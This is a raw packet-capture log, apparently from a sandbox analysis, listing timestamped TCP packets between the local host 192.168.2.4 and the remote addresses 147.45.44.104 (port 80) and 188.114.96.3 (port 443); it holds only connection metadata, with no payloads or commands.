Sep 27, 2024 00:15:13.719085932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.719183922 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.811597109 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.811628103 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.811646938 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.811743975 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.811880112 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.811894894 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.811912060 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.811927080 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.811945915 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.811985970 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.812342882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.812359095 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.812372923 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.812381029 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.812419891 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.812835932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.812907934 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.812992096 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813005924 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813020945 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813035965 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813046932 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.813051939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813067913 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813085079 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813090086 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.813113928 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.813788891 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813810110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813826084 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813842058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813844919 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.813857079 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813873053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813882113 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.813889980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813903093 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.813906908 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.813946962 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.814821959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.814837933 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.814852953 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.814867973 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.814877033 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.814883947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.814896107 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.814903021 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.814927101 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.814932108 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.814980030 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.815713882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.815731049 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.815745115 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.815761089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.815776110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.815778971 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.815825939 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.816318035 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.816332102 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.816358089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.816373110 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.816380978 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.816390038 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.816395998 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.816406965 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.816422939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.816436052 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.816467047 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.817282915 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.817298889 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.817313910 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.817328930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.817342997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.817358017 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.817368031 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.817373991 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.817378044 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.817390919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.817404985 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.817475080 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.818244934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.818260908 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.818275928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.818290949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.818305016 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.818321943 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.818336964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.818337917 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.818351984 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.818356991 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.818408966 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.819251060 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.819267035 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.819282055 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.819297075 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.819313049 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.819320917 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.819328070 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.819338083 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.819344044 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.819360018 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.819366932 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.819394112 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.820209980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.820225954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.820240021 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.820255041 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.820270061 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.820283890 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.820286036 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.820302010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.820319891 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.820343971 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.821211100 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.821224928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.821239948 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.821254969 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.821269035 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.821280956 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.821285963 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.821301937 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.821316957 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.821330070 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.821347952 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.822143078 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.822159052 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.822174072 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.822187901 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.822191000 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.822225094 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.822243929 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.822253942 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.822278023 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.867680073 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.901782036 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.901819944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.901834011 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.901876926 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.901973009 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.901988983 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902004957 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902021885 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902024031 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.902055025 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.902426958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902445078 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902460098 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902467966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902477026 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902488947 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.902532101 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.903023005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903038979 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903053999 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903069973 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903075933 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.903088093 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903106928 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903115034 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.903129101 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.903666019 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903681993 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903700113 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.903708935 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.903742075 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.903915882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904031038 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904046059 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904061079 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904074907 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904082060 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.904090881 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904105902 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.904105902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904135942 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.904912949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904930115 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904943943 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904958963 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904973030 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904988050 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.904995918 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.905004025 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905009985 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.905019999 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905047894 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.905792952 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905807972 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905822992 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905838013 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905853033 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905858040 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.905870914 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905883074 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.905886889 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905899048 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.905903101 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905916929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.905926943 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.905958891 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.906675100 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.906691074 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.906706095 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.906721115 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.906734943 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.906745911 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.906749010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.906773090 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.906774998 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.906790018 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.906791925 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.906832933 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.907463074 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.907545090 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.907562017 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.907587051 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.907744884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.907758951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.907773972 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.907788992 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.907823086 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.908175945 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908190966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908206940 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908220053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908229113 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.908236027 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908251047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908267021 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908274889 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.908283949 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908298969 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908299923 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.908315897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.908327103 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.908345938 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.909041882 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909056902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909071922 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909085989 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909090042 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.909095049 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909110069 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909123898 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909125090 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.909141064 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909148932 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.909157991 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909173965 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909178019 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.909194946 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.909946918 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909961939 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909976959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.909991026 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910003901 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910006046 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910020113 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910022974 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910037994 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910047054 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910054922 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910069942 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910079002 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910090923 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910105944 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910121918 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910144091 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910866976 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910882950 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910897017 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910912037 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910927057 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910932064 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910943031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910948038 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910959959 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910979033 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.910985947 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.910995007 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911010981 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911032915 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.911056995 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.911797047 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911813021 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911834002 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911849022 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911855936 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.911864042 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911878109 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911890984 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911902905 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.911906004 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911920071 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.911921978 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911945105 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.911952972 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.911992073 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.912628889 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.912643909 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.912658930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.912672997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.912688971 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.912691116 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.912729025 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.935854912 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:13.935923100 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:13.937731981 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:13.937742949 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:13.937988043 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:13.939691067 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:13.939691067 CEST	49776	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:13.939758062 CEST	443	49776	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:13.990066051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990094900 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990108967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990156889 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.990206003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990221024 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990237951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990252972 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990262985 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.990279913 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.990303993 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990318060 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990334034 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990348101 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990355015 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.990380049 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:13.990576982 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:13.990592957 CEST	80	49774	147.45.44.104	192.168.2.4
